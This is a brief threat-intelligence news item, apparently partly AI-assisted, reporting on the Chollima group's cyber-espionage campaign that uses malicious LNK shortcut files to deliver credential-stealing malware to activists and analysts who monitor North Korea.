Chollima Hackers Use Stealth LNK Malware in Targeted Cyber-Espionage Campaign
The Chollima advanced persistent threat group has initiated a targeted cyber-espionage campaign using malicious Windows shortcut files (LNK) to deliver multi-stage malware aimed at activists and analysts monitoring North Korea. By embedding weaponized LNK files in compressed attachments or cloud-hosted links, the campaign effectively bypassed security filters, enabling the theft of sensitive information and system reconnaissance. Security firms noted the campaign's evolution in tactics, reflecting similarities to previous Chollima operations.
Theia Market Signal Identification - AI Assisted
The Chollima advanced persistent threat group has launched a cyber-espionage campaign utilizing malicious Windows shortcut files (LNK) to deliver multi-stage malware targeting activists and analysts monitoring North Korea. The campaign featured weaponized LNK files embedded in compressed attachments or cloud-hosted links, allowing the emails to bypass security filters.
Opening an LNK file triggered a hidden command sequence that executed PowerShell scripts to download further malware components from disguised sources. The malware focused on information theft and system reconnaissance, harvesting system metadata, browser credentials, and documents, then sending this data to command-and-control servers.
The campaign leveraged trust networks by impersonating recognized experts, enhancing its effectiveness. Security firms noted similarities to previous Chollima operations, highlighting incremental evolution in their methods and ongoing refinement of their tactics.
Comments